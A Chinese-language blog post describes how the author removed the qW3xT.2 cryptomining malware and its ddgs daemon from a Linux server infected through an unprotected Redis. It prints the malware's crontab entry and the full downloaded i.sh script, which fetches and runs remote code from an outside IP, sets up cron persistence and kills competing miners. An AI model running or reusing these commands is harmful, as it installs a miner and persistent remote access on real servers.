當前位置:
首頁 > 知識 > Linux 下qW3xT.2,解決挖礦病毒

Linux 下qW3xT.2,解決挖礦病毒

早上開啟電腦,連接伺服器,使用top查看cpu狀態。結果顯示進程佔用cpu99%以上。

Linux 下qW3xT.2,解決挖礦病毒

在網上百度,了解到qW3xT.2是一個挖礦病毒。也就是說別人利用你的電腦挖礦。謀取利益。

解決辦法:

1、首先解決redis入口問題,因為最開始沒有設置密碼,所以首先修改redis.conf。設置密碼,然後重啟redis

2、進入/tmp文件夾下。發現qW3xT.2文件,刪除。之後kill掉qW3xT.2該進程,但是一段時間之後,發現該行程又重新啟動。

肯定是有守護進程,觀察top命令下的進程,發現一個可疑的進行

Linux 下qW3xT.2,解決挖礦病毒

3、在/tmp文件夾下發現該進程的文件 ls /tmp

發現qW3xT.2文件又重新生成了。這時,首先刪除qW3xT.2文件和ddgs.3013文件,然後使用top查詢qW3xT.2和ddgs.3013的pid,直接kill掉。

4、一段時間之後,刪除的文件重新生成,dds和挖礦的進程又重新執行。此時懷疑是否有計劃任務,此時查看計劃任務的列表

[root@iZbp1cbg04oh74k1dexpujZ tmp]# crontab -l
*/15 * * * * curl -fsSL http://149.56.106.215:8000/i.sh | sh
[root@iZbp1cbg04oh74k1dexpujZ tmp]# crontab -r //刪除計劃任務

curl 的這幾個 optional 介紹,我也是百度的

-f - fail在HTTP錯誤(H)上靜默失敗(根本沒有輸出)

-s -silent靜音模式。 不要輸出任何東西

–socks4 HOST [:PORT]給定主機+埠上的SOCKS4代理

–socks4a HOST [:PORT]給定主機+埠上的SOCKS4a代理

–socks5 HOST [:PORT]給定主機+埠上的SOCKS5代理

–socks5-hostname HOST [:PORT] SOCKS5代理,將主機名傳遞給代理

–socks5-gssapi-service名稱為gssapi的SOCKS5代理服務名稱

–socks5-gssapi-nec與NEC SOCKS5伺服器的兼容性

-S –show-error顯示錯誤。 使用-s時,make curl會在出現錯誤時顯示錯誤

-L –location遵循重定向(H)

–location-trusted like –location並將auth發送給其他主機(H)

此時計劃任務已經刪除。詳細信息查看https://juejin.im/post/5b62b975f265da0f9628a820。

計劃任務刪除完成之後,這個13又開始運行。太頑固了。

於是我又看計劃任務的內容,是否是有東西沒有刪除乾淨。

[root@FantJ tmp]# curl -fsSL http://149.56.106.215:8000/i.sh
export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin
echo "" > /var/spool/cron/root
echo "*/15 * * * * curl -fsSL http://149.56.106.215:8000/i.sh | sh" >> /var/spool/cron/root
mkdir -p /var/spool/cron/crontabs
echo "" > /var/spool/cron/crontabs/root
echo "*/15 * * * * curl -fsSL http://149.56.106.215:8000/i.sh | sh" >> /var/spool/cron/crontabs/root
ps auxf | grep -v grep | grep /tmp/ddgs.3013 || rm -rf /tmp/ddgs.3013
if [ ! -f "/tmp/ddgs.3013" ]; then
curl -fsSL http://149.56.106.215:8000/static/3013/ddgs.$(uname -m) -o /tmp/ddgs.3013
fi
chmod +x /tmp/ddgs.3013 && /tmp/ddgs.3013
ps auxf | grep -v grep | grep Circle_MI | awk "{print $2}" | xargs kill
ps auxf | grep -v grep | grep get.bi-chi.com | awk "{print $2}" | xargs kill
ps auxf | grep -v grep | grep hashvault.pro | awk "{print $2}" | xargs kill
ps auxf | grep -v grep | grep nanopool.org | awk "{print $2}" | xargs kill
ps auxf | grep -v grep | grep minexmr.com | awk "{print $2}" | xargs kill
ps auxf | grep -v grep | grep /boot/efi/ | awk "{print $2}" | xargs kill
#ps auxf | grep -v grep | grep ddg.2006 | awk "{print $2}" | kill
#ps auxf | grep -v grep | grep ddg.2010 | awk "{print $2}" | kill
發現計劃任務在伺服器中創建了幾個文件,
/var/spool/cron/crontabs/root
/var/spool/cron/root
內容是*/15 * * * * curl -fsSL http://149.56.106.215:8000/i.sh | sh。(與計劃任務相同)
將計劃任務中創建的文件刪除。

最終,這個挖礦病毒終於刪除完成

喜歡這篇文章嗎?立刻分享出去讓更多人知道吧!

本站內容充實豐富,博大精深,小編精選每日熱門資訊,隨時更新,點擊「搶先收到最新資訊」瀏覽吧!


請您繼續閱讀更多來自 程序員小新人學習 的精彩文章:

「Hadoop」hadoop 文件上傳和下載分析
unix環境高級編程讀後感

TAG:程序員小新人學習 |